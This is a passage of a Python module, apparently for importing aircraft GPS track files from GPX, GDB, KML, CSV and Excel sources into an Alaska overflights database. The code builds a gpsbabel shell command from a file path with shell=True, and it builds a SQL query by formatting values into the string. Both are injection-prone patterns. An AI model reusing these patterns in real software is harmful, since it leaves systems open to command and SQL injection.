gdf.loc[~gdf.utc_datetime.isna()] # drop any points without a time. 
some garmin GPX files do this\r\n\r\n # Make points 3D\r\n gdf['altitude_ft'] = (gdf.ele * FEET_PER_METER).astype(int)\r\n gdf.geometry = gdf.apply(lambda row: shapely_Point(row.geometry.x, row.geometry.y, row.altitude_ft), axis=1)\r\n\r\n gdf['longitude'] = gdf.geometry.x\r\n gdf['latitude'] = gdf.geometry.y\r\n\r\n # Calculate speed and bearing because GPX files don't have it\r\n gdf.sort_values(by='utc_datetime', inplace=True)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n gdf['heading'] = gdf.apply(lambda row:\r\n calc_bearing(*row[['previous_lat', 'previous_lon', 'latitude', 'longitude']]),\r\n axis=1)\\\r\n .fillna(-1).round().astype(int)\r\n\r\n return gdf\r\n\r\n\r\ndef read_gdb(path, seg_time_diff=None):\r\n '''\r\n Convert GDB to GPX, then just use read_gpx() function\r\n '''\r\n\r\n stderr_path = os.path.join(os.path.dirname(path), 'stderr.txt')\r\n out_path = path.replace('.gdb', '.gpx')\r\n error_message, result_code = '', None # initialize in case there's an error before assigning within *with* block\r\n with open(stderr_path, 'wb+') as stderr:\r\n result_code = subprocess.call('gpsbabel -t -i gdb,via=1 -f \"{in_path}\" -o gpx -F \"{out_path}\"'\r\n .format(in_path=path, out_path=out_path),\r\n shell=True, stderr=stderr)\r\n stderr.seek(0)\r\n error_message = stderr.read()\r\n\r\n # Clean up the text file that contained the error message (if there was one)\r\n if os.path.isfile(stderr_path):\r\n os.remove(stderr_path)\r\n\r\n # If the error message isn't blank, the conversion failed\r\n if len(error_message) and result_code != 0:\r\n raise IOError(error_message)\r\n\r\n return read_gpx(out_path)\r\n\r\n\r\ndef parse_web_sentinel_xml(parser, seg_time_diff=15):\r\n\r\n points = []\r\n for placemark in parser.find_all('Placemark'):\r\n if placemark.find('styleUrl').text == '#waypt':\r\n if not placemark.description:\r\n raise ValueError\r\n content = {\r\n k.strip(): v.strip() for k, v in\r\n [\r\n [j for j in i.split(':', 1)]\r\n for i in placemark.description.text.split('\\n')\r\n if ':' in i\r\n ]\r\n }\r\n coordinate_el = placemark.find('coordinates')\r\n if not coordinate_el:\r\n raise ValueError\r\n coordinates = [c.strip() for c in coordinate_el.text.split(',')]\r\n content['latitude'] = float(coordinates[1])\r\n content['longitude'] = float(coordinates[0])\r\n if len(coordinates) > 2:\r\n content['altitude_ft'] = float(coordinates[2])\r\n elif 'Feet' in content:\r\n content['altitude_ft'] = float(content['Feet'])\r\n else:\r\n raise RuntimeError('No altitude value for point in KML file:\\n%s' % placemark.prettify())\r\n\r\n if 'Knots' in content:\r\n content['knots'] = float(content['Knots'])\r\n content['utc_datetime'] = pd.to_datetime(content['UTC'])\r\n\r\n points.append(content)\r\n\r\n df = pd.DataFrame(points).sort_values('utc_datetime')\r\n geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n 
gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n if 'knots' not in gdf:\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n gdf['heading'] = gdf.apply(lambda row:\r\n calc_bearing(*row[['previous_lat', 'previous_lon', 'latitude', 'longitude']]),\r\n axis=1)\\\r\n .fillna(-1).round().astype(int)\r\n\r\n return gdf\r\n\r\n\r\ndef parse_inreach_xml(parser, seg_time_diff=15):\r\n\r\n points = []\r\n for placemark in parser.find_all('Placemark'):\r\n if placemark.find('kml:Point'):\r\n points.append({d['name']: d.find('value').text for d in placemark.find_all('kml:Data') if d.find('value')})\r\n\r\n df = pd.DataFrame(points)\r\n\r\n df['ak_datetime'] = pd.to_datetime(df['Time'])\r\n df['utc_datetime'] = pd.to_datetime(df['Time UTC'])\r\n df = df.sort_values('ak_datetime') \\\r\n .loc[df.Event.str.lower().str.contains('tracking')]\\\r\n .rename(columns={c: c.lower().replace(' ', '_') for c in df.columns})\r\n\r\n\r\n # Search for registration because with an InReach, it seems particularly likely that multiple aircraft might be\r\n # included in the same file\r\n for c in df.columns:\r\n registration = df[c].astype(str).str.extract(f'({REGISTRATION_REGEX})').squeeze().str.upper().fillna(False)\r\n if registration.all():\r\n df['registration'] = registration\r\n break\r\n\r\n if not (df.spatialrefsystem.dropna() == 'WGS84').all():\r\n raise RuntimeError('Not all coordinates in WGS84')\r\n\r\n df.longitude = df.longitude.astype(float)\r\n df.latitude = df.latitude.astype(float)\r\n df['altitude_ft'] = df.elevation.str.extract(r'(\\d*\\.\\d*)').astype(float) * FEET_PER_METER\r\n\r\n geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n if 'knots' not in gdf:\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n gdf['heading'] = gdf.apply(lambda row:\r\n calc_bearing(*row[['previous_lat', 'previous_lon', 'latitude', 'longitude']]),\r\n axis=1)\\\r\n .fillna(-1).round().astype(int)\r\n\r\n return gdf\r\n\r\n\r\ndef parse_flightradar_xml(parser, seg_time_diff):\r\n points = []\r\n placemarks = parser.find('Folder').find('name', text='Route').find_next_siblings('Placemark')\r\n for placemark_ in placemarks:\r\n key_tags = bs4.BeautifulSoup(placemark_.description.text, 'xml').select('span > b')\r\n content = {tag.text.strip(': '): tag.parent.find_next_sibling('span').text.strip() for tag in key_tags}\r\n\r\n content['utc_datetime'] = pd.to_datetime(placemark_.select_one('TimeStamp > when').text)\r\n point = placemark_.find('Point')\r\n altitude_mode = point.find('altitudeMode').text \r\n if 
altitude_mode != 'absolute':\r\n            raise RuntimeError(f'Altitude mode for this KML is {altitude_mode}, not absolute. Cannot determine actual altitude')\r\n        longitude, latitude, altitude = [c.strip() for c in point.find('coordinates').text.split(',')]\r\n        content['longitude'] = float(longitude)\r\n        content['latitude'] = float(latitude)\r\n        content['altitude_m'] = float(altitude)\r\n        \r\n        if 'Speed' in content:\r\n            try:\r\n                content['knots'] = float(re.match('\\d+', content['Speed']).group())\r\n            except:\r\n                pass\r\n        \r\n        if 'Heading' in content:\r\n            try:\r\n                content['heading'] = float(re.match('\\d+', content['Heading']).group())\r\n            except:\r\n                pass\r\n        points.append(content)\r\n\r\n    df = pd.DataFrame(points)\r\n    df['altitude_ft'] = df.altitude_m * FEET_PER_METER\r\n    geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n    gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n\r\n    gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n    gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n    gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n    gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n    if 'knots' not in gdf:\r\n        gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n        gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n    gdf['previous_lat'] = gdf.shift().latitude\r\n    gdf['previous_lon'] = gdf.shift().longitude\r\n\r\n    return gdf\r\n\r\n\r\ndef read_kml(path, seg_time_diff=15):\r\n    '''\r\n    KMLs come in four accepted variants: Foreflight, FlightRadar, InReach, and Web Sentinel. If the file is of the Foreflight variant, convert the KML to GPX, then just use the read_gpx() function. Otherwise, parse the file and convert directly to a GeoDataframe.\r\n    KML formats are:\r\n    1. Foreflight:\r\n        <Placemark>\r\n            <styleUrl>#trackStyle</styleUrl>\r\n            <gx:Track>\r\n                <when>2019-11-17T18:45:59.015Z</when>\r\n                <gx:coord>-147.85804607913613 64.80618080143059 126.2699673929132</gx:coord>\r\n                ...\r\n            </gx:Track>\r\n        </Placemark>\r\n\r\n    2. Web Sentinel:\r\n        <Placemark>\r\n            <styleUrl>#waypt</styleUrl>\r\n            <description>\r\n                UTC: Wed Jun 10 18:37:00 PDT 2020\r\n                Lat: 63.73285333 N\r\n                Lon: -148.91178833 E\r\n                Knots: 0\r\n                Track: 356\r\n                Feet: 1738.845147\r\n            </description>\r\n            <Point>\r\n                <altitudeMode>absolute</altitudeMode>\r\n                <coordinates>-148.91178833,63.73285333,530.0</coordinates>\r\n            </Point>\r\n        </Placemark>\r\n        ...\r\n    '''\r\n\r\n    with open(path, encoding='utf-8') as f:\r\n        soup = bs4.BeautifulSoup(f, 'xml')\r\n\r\n    if soup.find('name', text='www.websentinel.net'):\r\n        try:\r\n            return parse_web_sentinel_xml(soup, seg_time_diff)\r\n        except Exception as e:\r\n            raise RuntimeError('Could not parse Web Sentinel KML file %s: %s' % (path, e))\r\n\r\n    elif soup.find('kml:Data', attrs={'name': 'IMEI'}):\r\n        try:\r\n            return parse_inreach_xml(soup, seg_time_diff)\r\n        except RuntimeError as e:\r\n            raise RuntimeError('Could not process %s because %s' % (path, e))\r\n        except Exception as e:\r\n            raise RuntimeError('Could not parse InReach KML file %s: %s' % (path, e))\r\n    \r\n    elif soup.find(lambda tag: tag.name == 'description' and 'www.flightradar24.com' in tag.text):\r\n        try:\r\n            return parse_flightradar_xml(soup, seg_time_diff)\r\n        except Exception as e:\r\n            raise RuntimeError('Could not parse Flight Radar KML file %s: %s' % (path, e))\r\n\r\n    elif soup.find('gx:Track'):\r\n        try:\r\n            parser = kml_parser.ForeflightKMLParser()\r\n            gpx_path = parser.to_gpx(path, path.replace('.kml', '_from_kml.gpx'))\r\n        except Exception as e:\r\n            raise RuntimeError('Could not parse KML file %s from Foreflight format: %s' % (path, e))\r\n        return read_gpx(gpx_path, seg_time_diff)\r\n    \r\n    else:\r\n        raise RuntimeError('Could not understand KML format of file %s' % path)\r\n\r\n\r\ndef format_aff(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n    df = pd.read_csv(path, encoding=encoding)\r\n    df.rename(columns=CSV_OUTPUT_COLUMNS['aff'], inplace=True)\r\n\r\n    df.utc_datetime = pd.to_datetime(df.utc_datetime, errors='coerce')\r\n\r\n    return df\r\n\r\n\r\ndef dms_to_dd(degrees, minutes, seconds, direction):\r\n    ''' Convert coordinate in degrees minutes seconds to decimal degrees'''\r\n    decimal_degrees = float(degrees) + float(minutes)/60 + float(seconds)/(3600)\r\n\r\n    if direction in ['S', 'W']:\r\n        decimal_degrees *= -1\r\n\r\n    return decimal_degrees\r\n\r\n\r\ndef parse_gsat_coordinates(coordinates):\r\n    '''GSAT coordinates are in the format 62°37'21.9600\"N 150°44'42.0000\"W in a single Lat/Lng field'''\r\n\r\n    # Make lists of [degrees, min, sec, direction] for both lat and lon\r\n    lat_dms, lon_dms = [re.split('[°\\'\"]+', c) for c in coordinates.split()]\r\n\r\n    return dms_to_dd(*lat_dms), dms_to_dd(*lon_dms)\r\n\r\n\r\ndef format_gsat(path, encoding='ISO-8859-1', skip_rows=0):\r\n\r\n    # Try to get the registration number. 
It's stored in the third row, even though the metadata header is the first row\r\n    try:\r\n        registration = 'N' + pd.read_csv(path, encoding=encoding).loc[2, 'Asset']\r\n    except:\r\n        registration = ''\r\n\r\n    df = pd.read_csv(path, encoding=encoding, skiprows=skip_rows)\r\n    for i in range(1, 6):\r\n        if 'lat/lng' in df.columns.str.lower():\r\n            break\r\n        df = pd.read_csv(path, encoding=encoding, skiprows=i)\r\n    df.dropna(subset=['Lat/Lng'], inplace=True)\r\n\r\n    #df = pd.read_csv(path, encoding='ISO-8859-1', skiprows=5)\r\n    # If this didn't fail, add a registration column\r\n    if registration:\r\n        df['registration'] = registration\r\n\r\n    # Convert coordinates to separate decimal degree lat and lon fields\r\n    df['latitude'], df['longitude'] = list(zip(*df['Lat/Lng'].apply(parse_gsat_coordinates)))\r\n\r\n    # Remove \"knots\" in speed field\r\n    df['knots'] = df['Speed'].astype(str).str.split(' ').str[0].astype(float)\r\n\r\n    # Replace degree symbol in heading. For some GSAT files, it's not there, in which case pandas reads the column\r\n    # as floats. So first,\r\n    # convert to string,\r\n    # then try to remove the degree symbol,\r\n    # then convert back to float because the decimal will cause .astype(int) to throw an error,\r\n    # then to int\r\n    df['heading'] = df['Heading']\\\r\n        .astype(str)\\\r\n        .str.replace('°', '')\\\r\n        .astype(float)\\\r\n        .astype(int)\r\n\r\n    df['altitude_ft'] = df['Altitude'].str.split(' ').str[0].astype(float).round().astype(int) # Replace \"ft\" and convert to int\r\n\r\n    # GSAT datetimes are in local time, so calculate UTC from the local timestamps\r\n    df['ak_datetime'] = pd.to_datetime(df['Date'], errors='coerce')\r\n    timezone = pytz.timezone('US/Alaska')\r\n    df['utc_datetime'] = df.ak_datetime - df.ak_datetime.apply(timezone.utcoffset)\r\n\r\n    return df\r\n\r\n\r\ndef format_spy(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n    df = pd.read_csv(path, encoding=encoding)\r\n\r\n    if 'Speed(mph)' in df:\r\n        df['knots'] = df['Speed(mph)'] / 1.151\r\n    elif 'Speed(knots)' in df:\r\n        df['knots'] = df['Speed(knots)']\r\n    else:\r\n        raise KeyError('\"Speed\" column for file %s not found. Expected either \"Speed(mph)\" or \"Speed(knots)\" but columns in this file are:\\n\\t-%s' % (path, '\\n\\t-'.join(df.columns.sort_values())))\r\n\r\n    df.rename(columns=CSV_OUTPUT_COLUMNS['spy'], inplace=True)\r\n    expected_lat_fields = [k for k, v in CSV_OUTPUT_COLUMNS['spy'].items() if v == 'latitude']\r\n    expected_lon_fields = [k for k, v in CSV_OUTPUT_COLUMNS['spy'].items() if v == 'longitude']\r\n    try:\r\n        df[['latitude', 'longitude']] = df[['latitude', 'longitude']].astype(float)\r\n    except KeyError as e:\r\n        raise KeyError('No latitude and/or longitude fields found. Expected one of {lat_fields} for latitude fields and'\r\n                       ' {lon_fields} for longitude fields. 
Input fields were:\\n\\t-{columns}'\r\n                       .format(lat_fields=expected_lat_fields, lon_fields=expected_lon_fields, columns='\\n\\t-'.join(df.columns))\r\n                       )\r\n\r\n    df.altitude_ft = df.altitude_ft.astype(int)\r\n    df.utc_datetime = pd.to_datetime(df.utc_datetime, errors='coerce')\r\n    df.ak_datetime = pd.to_datetime(df.ak_datetime, errors='coerce')\r\n\r\n    return df\r\n\r\n\r\ndef format_tms(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n    df = pd.read_csv(path, encoding=encoding)\r\n\r\n    # some of the time, TMS column names have spaces on either end\r\n    df.columns = df.columns.str.strip()\r\n\r\n    df.rename(columns=CSV_OUTPUT_COLUMNS['tms'], inplace=True)\r\n\r\n    # Lat and lon are (annoyingly) in the format DDMM.MMMM without any separator between degrees and minutes, so attempt\r\n    # to parse them\r\n    try:\r\n        coefficient = df['HemNS'].apply(lambda x: 1 if x == 'N' else -1)\r\n        df['latitude'] = (df['latitude'].astype(str).str[:2].astype(float) + df['latitude'].astype(str).str[2:].astype(float)/60) * coefficient\r\n    except Exception as e:\r\n        raise AttributeError('Could not parse latitude field for %s because of %s' % (path, e))\r\n    try:\r\n        coefficient = df['HemEW'].apply(lambda x: -1 if x == 'W' else 1)\r\n        df['longitude'] = (df['longitude'].astype(str).str[:3].astype(float) + df['longitude'].astype(str).str[3:].astype(float)/60) * coefficient\r\n    except Exception as e:\r\n        raise AttributeError('Could not parse longitude field for %s because of %s' % (path, e))\r\n\r\n    df['altitude_ft'] = (df['Altitude (m)'] * FEET_PER_METER).astype(int)\r\n    df['utc_datetime'] = pd.to_datetime(df['utc_datetime'], errors='coerce')\r\n\r\n    return df\r\n\r\n\r\ndef format_foreflight_csv(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n    try:\r\n        registration = pd.read_csv(path, encoding=encoding, nrows=5).loc[0, 'Tail Number']\r\n    except:\r\n        registration = ''\r\n    df = pd.read_csv(path, encoding=encoding, skiprows=2)\r\n    df['registration'] = registration\r\n\r\n    # Timestamps are in local time. 
The rest of the read functions all return UTC time, so calculate that, even though\r\n    # the local time will just be calculated later\r\n    epoch_datetime = datetime(1970, 1, 1)\r\n    df['utc_datetime'] = pd.to_datetime([epoch_datetime + timedelta(seconds=round(ts/1000)) for ts in df['Timestamp']])\r\n\r\n    # Convert altitude meters to feet\r\n    df['altitude_ft'] = (df['Altitude'] * FEET_PER_METER).astype(int)\r\n\r\n    # Rename other columns that don't need to be recalculated\r\n    df.rename(columns={'Longitude': 'longitude',\r\n                       'Latitude': 'latitude',\r\n                       'Course': 'heading',\r\n                       'Speed': 'knots'},\r\n              inplace=True)\r\n\r\n    return df\r\n\r\n\r\ndef read_excel(path):\r\n    \"\"\"\r\n    Wrapper for read_csv() (after converting the Excel file to a CSV)\r\n    :param path: Excel track\r\n    :return: GeoDataFrame of the track file\r\n    \"\"\"\r\n    df = pd.read_excel(path)\r\n    _, ext = os.path.splitext(path)\r\n    csv_path = path.replace(ext, '.csv')\r\n    df.to_csv(csv_path, index=False)\r\n\r\n    return read_csv(csv_path)\r\n\r\n\r\ndef get_csv_type(path, encoding):\r\n    \"\"\"\r\n    Helper function to try to determine the CSV source\r\n    :param path:\r\n    :param encoding:\r\n    :return:\r\n    \"\"\"\r\n    column_match_scores = pd.Series([0])\r\n    skip_rows = 0\r\n    best_match = None\r\n    while skip_rows < 10:\r\n        df = pd.read_csv(path, encoding=encoding, nrows=2, skiprows=skip_rows)\r\n        df.columns = df.columns.str.strip()\r\n        # Figure out which file type it is (aff, gsat, spy, tms, or foreflight) by selecting the file type that most closely matches\r\n        # the expected columns per type\r\n        named_columns = df.columns[~df.columns.str.startswith('Unnamed')].str.strip()\r\n\r\n        if len(named_columns):\r\n            # Score how closely this row's named columns match each known file type\r\n\r\n            column_match_scores = pd.Series({\r\n                file_type: len(named_columns[named_columns.isin(pd.Series(columns).str.strip())]) / float(len(named_columns))\r\n                for file_type, columns in CSV_INPUT_COLUMNS\r\n            })\r\n\r\n            if column_match_scores.any():\r\n                best_match = column_match_scores.idxmax() #index is file_type\r\n                break\r\n\r\n        skip_rows += 1\r\n\r\n    return best_match, skip_rows\r\n\r\n\r\ndef read_csv(path, seg_time_diff=None):\r\n    \"\"\"\r\n    Read and format a CSV of track data. CSVs can come from five different sources, so figure out which source it comes\r\n    from and format accordingly\r\n\r\n    :param path: path to track CSV\r\n    :return: GeoDataframe of points\r\n    \"\"\"\r\n    # Try to determine the file's encoding\r\n    detector = chardet.universaldetector.UniversalDetector()\r\n    encoding = ''\r\n    with open(path, 'rb') as f:\r\n        for line in f.readlines():\r\n            detector.feed(line)\r\n            if detector.done:\r\n                encoding = detector.result['encoding']\r\n                break\r\n    \r\n    detector.close()\r\n    # Get the encoding even if the detector doesn't have high confidence\r\n    encoding = detector.result['encoding']\r\n    #raise RuntimeError('Could not determine encoding of file ' + path)\r\n    \r\n\r\n    CSV_FUNCTIONS = {'aff': format_aff,\r\n                     'gsat': format_gsat,\r\n                     'spy': format_spy,\r\n                     'tms': format_tms,\r\n                     'foreflight': format_foreflight_csv\r\n                     }\r\n\r\n    best_match, skip_rows = get_csv_type(path, encoding)\r\n    \r\n    if best_match not in CSV_FUNCTIONS:\r\n        sorted_types = sorted(CSV_FUNCTIONS.keys())\r\n        raise IOError(\r\n            'The data source could not be interpreted from the column names. ' +\r\n            ('Only %s, and %s currently accepted.' 
% (', '.join(sorted_types[:-1]), sorted_types[-1]))\r\n        )\r\n\r\n    df = CSV_FUNCTIONS[best_match](path, encoding, skip_rows=skip_rows)\r\n    df.heading = df.heading.round().astype(int)\r\n    df.knots = df.knots.round().astype(int)\r\n\r\n    # Make the dataframe into a geodataframe of points\r\n    geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n    gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n    gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n\r\n    return gdf\r\n\r\n\r\ndef get_flight_id(gdf, seg_time_diff):\r\n    '''\r\n    Assign a unique ID to each line segment. IDs use the registration (i.e. N-number) and timestamp like\r\n    <registration>_yyyymmddhhMM. All columns are assigned in place.\r\n    '''\r\n    # Calculate the difference in time between rows\r\n    time_diff = gdf.ak_datetime.diff() / np.timedelta64(1, 'm')#.groupby(gdf['date_str']).diff() # don't groupby day in case there's an overnight flight\r\n    # Assign a sequential integer to each different flight segment for the file. Only the start of a new flight will\r\n    # have a difference in time with its previous row of more than seg_time_diff (in theory), so these rows will\r\n    # evaluate to True. Also start a new segment where the is_new_segment column is True (this column is potentially \r\n    # altered in the web app when a track is split, but if it doesn't exist in the data, create it). cumsum() treats \r\n    # these as a 1 and False values as 0, so all rows of the same segment will have the same ID.\r\n    if 'is_new_segment' not in gdf:\r\n        gdf['is_new_segment'] = False\r\n    gdf['segment_id'] = ((time_diff >= seg_time_diff) | gdf.is_new_segment).cumsum()\r\n    \r\n    departure_times = gdf.groupby('segment_id').ak_datetime.min().to_frame().rename(columns={'ak_datetime': 'departure_datetime'})\r\n    gdf = gdf.merge(departure_times, on='segment_id')\r\n    gdf['timestamp_str'] = gdf.departure_datetime.dt.floor('%smin' % seg_time_diff).dt.strftime('%Y%m%d%H%M')\r\n    gdf['flight_id'] = gdf.registration + '_' + gdf.timestamp_str#gdf.date_str + '_' + segment_id.astype(str)\r\n\r\n    return gdf\r\n\r\n\r\nREAD_FUNCTIONS = {'.gpx': read_gpx,\r\n                  '.gdb': read_gdb,\r\n                  '.csv': read_csv,\r\n                  '.kml': read_kml,\r\n                  '.xlsx': read_excel\r\n                  }\r\n\r\n\r\ndef check_duplicate_flights(registration, connection, start_time, end_time):\r\n    \"\"\"\r\n    Check whether an aircraft with this registration has been recorded in the DB for any time within a given start and\r\n    end time\r\n\r\n    :param registration: Tail (N-) number for this flight\r\n    :param connection: SQLAlchemy DB connection (from engine.connect()) pointing to postgres backend overflights DB\r\n    :param start_time: starting time for this flight\r\n    :param end_time: ending time for this flight\r\n    :return: pd.DataFrame of matching flight points\r\n    \"\"\"\r\n    sql = \"\"\"\r\n    SELECT flights.* \r\n    FROM flight_points \r\n    INNER JOIN flights ON flight_points.flight_id = flights.id\r\n    WHERE\r\n        flight_points.ak_datetime BETWEEN '{start_time}' AND '{end_time}' AND\r\n        flights.registration = '{registration}'\r\n    \"\"\"\\\r\n        .format(start_time=start_time.strftime('%Y-%m-%d %H:%M'),\r\n                end_time=end_time.strftime('%Y-%m-%d %H:%M'),\r\n                registration=registration)\r\n\r\n    #with engine.connect() as conn, conn.begin():\r\n    matching_flights = pd.read_sql(sql, connection).drop_duplicates(subset=['registration', 'departure_datetime'])\r\n\r\n    return matching_flights\r\n\r\n\r\ndef calculate_duration(gdf):\r\n    \"\"\"\r\n    Helper function to calculate landing time and duration. 
This needs to happen \r\n    in format_track(), but it also needs to be recalculated after edits\r\n    \"\"\" \r\n    land_times = gdf.groupby('segment_id').ak_datetime.max().to_frame().rename(columns={'ak_datetime': 'land_time'})\r\n    gdf['landing_datetime'] = gdf.merge(land_times, on='segment_id').land_time\r\n    gdf['duration_hrs'] = (gdf.landing_datetime - gdf.departure_datetime).dt.seconds/3600.0\r\n\r\n    return gdf\r\n\r\n\r\ndef format_track(path, seg_time_diff=15, min_point_distance=200, registration='', submission_method='manual', operator_code=None, aircraft_type=None, force_registration=True, **kwargs):\r\n\r\n    _, extension = os.path.splitext(path)\r\n\r\n    # try to apply function from dict based on file extension\r\n    try:\r\n        gdf = READ_FUNCTIONS[extension.lower()](path)\r\n    except:\r\n        # If that failed, try each track reading function\r\n        for ext in READ_FUNCTIONS.keys():\r\n            if ext == extension.lower():\r\n                continue # already tried this one so no sense in wasting the effort\r\n            else:\r\n                try:\r\n                    gdf = READ_FUNCTIONS[ext](path)\r\n                    # It might be possible for the read function to return a Geodataframe that just doesn't have the\r\n                    # right cols. If it doesn't, raise an exception to try the next function\r\n                    if not VALIDATION_COLUMNS.isin(gdf.columns).all():\r\n                        raise ValueError('GeoDataFrame is missing expected columns')\r\n                    break # if we got here, that means the file was successfully read\r\n                except:\r\n                    continue\r\n\r\n    if 'gdf' not in locals():\r\n        error_message = 'Unable to read the file %s' % path\r\n        if extension.lower() not in READ_FUNCTIONS:\r\n            sorted_extensions = [c.replace('.', '').upper() for c in sorted(READ_FUNCTIONS.keys())]\r\n            error_message += ' because it is likely of an unsupported file type: %s. Only %s, and %s currently accepted.' % \\\r\n                             (extension.replace('.', '').upper(), ', '.join(sorted_extensions[:-1]), sorted_extensions[-1])\r\n        raise IOError(error_message)\r\n\r\n    # Calculate local (AK) time\r\n    timezone = pytz.timezone('US/Alaska')\r\n    if 'ak_datetime' not in gdf.columns:\r\n        # If the timezone is defined (because it was included in the timestamp given by the file), convert to local time\r\n        # to get AK time\r\n        if gdf.utc_datetime.dt.tz:\r\n            gdf['ak_datetime'] = gdf.utc_datetime.dt.tz_convert(timezone)\r\n        else: # otherwise, calculate by adding the offset\r\n            gdf['ak_datetime'] = gdf.utc_datetime + gdf.utc_datetime.apply(timezone.utcoffset)\r\n    # track points are *usually* in chronological order, but not always. Also, some files have duplicated track points for\r\n    # some reason, so get rid of those. Resetting the index is important if this function is being called from \r\n    # poll_feature_service.py. The index is used to create a point_index field, which the track-editor app needs\r\n    # for splitting tracks and deleting points\r\n    gdf = gdf.sort_values('ak_datetime')\\\r\n        .drop_duplicates('ak_datetime')\\\r\n        .reset_index() \r\n\r\n    # Validate the registration\r\n    if 'registration' in gdf.columns and not force_registration: # Already in a column in the data\r\n        if registration:\r\n            warnings.warn('registration %s was given but the registration column found in the data will be '\r\n                          'used instead' % registration)\r\n        # verify that the reg. 
in each column matches the right pattern\r\n        regex_mask = gdf.registration.str.contains(REGISTRATION_REGEX, case=False)\r\n        if not all(regex_mask):\r\n            invalid_registrations = gdf.loc[~regex_mask, 'registration'].unique()\r\n            raise ValueError('A column with aircraft registrations was detected in the input file, but the following '\r\n                             'registrations were invalid:\\n\\t-%s' % '\\n\\t-'.join(invalid_registrations))\r\n    else:\r\n        # If given, make sure it matches the pattern (N1 to N99999, N1A to N9999Z, or N1AA to N999ZZ)\r\n        if registration:\r\n            if not re.fullmatch(REGISTRATION_REGEX, registration):\r\n                raise ValueError('The registration given, %s, is invalid' % registration)\r\n        # If the N-number wasn't given, try to find it in the file\r\n        else:\r\n            reg_matches = re.findall(REGISTRATION_REGEX, os.path.basename(path))\r\n            if len(reg_matches):\r\n                registration = reg_matches[0].upper()\r\n            else:\r\n                # Generate a bogus registration (starts with Z instead of N)\r\n                registration = 'Z' + \\\r\n                    ''.join(random.choices(string.digits, k=random.choice(range(1, 6)))) +\\\r\n                    ''.join(random.choices(string.ascii_uppercase, k=random.choice(range(1, 3))))\r\n                warnings.warn('No registration column in the data, none could be found in the filename, and none given.'\r\n                              ' Using %s instead (random alphanumerics and starting with \"Z\")' % registration)\r\n        # Otherwise, use the one given\r\n        gdf['registration'] = registration\r\n\r\n    gdf.registration = gdf.registration.str.upper()\r\n\r\n    # Get unique flight_ids per line segment in place\r\n    gdf = get_flight_id(gdf, seg_time_diff)\\\r\n        .drop(gdf.index[((gdf.diff_m < min_point_distance) & (gdf.utc_datetime.diff().dt.seconds == 0))])\\\r\n        .dropna(subset=['ak_datetime'])\\\r\n        .sort_values(by=['ak_datetime'])\r\n\r\n    gdf = calculate_duration(gdf)\r\n\r\n    # Get metadata-y columns\r\n    gdf['submission_time'] = (datetime.now()).strftime('%Y-%m-%d %H:%M')\r\n    gdf['submission_method'] = submission_method\r\n    gdf['is_new_segment'] = False\r\n    if operator_code:\r\n        gdf['operator_code'] = operator_code\r\n    if aircraft_type:\r\n        gdf['aircraft_type'] = aircraft_type\r\n    if 'tracks_notes' in gdf:\r\n        gdf['submitter_notes'] = gdf.tracks_notes\r\n\r\n    return gdf\r\n\r\n\r\ndef import_data(connection_txt=None, 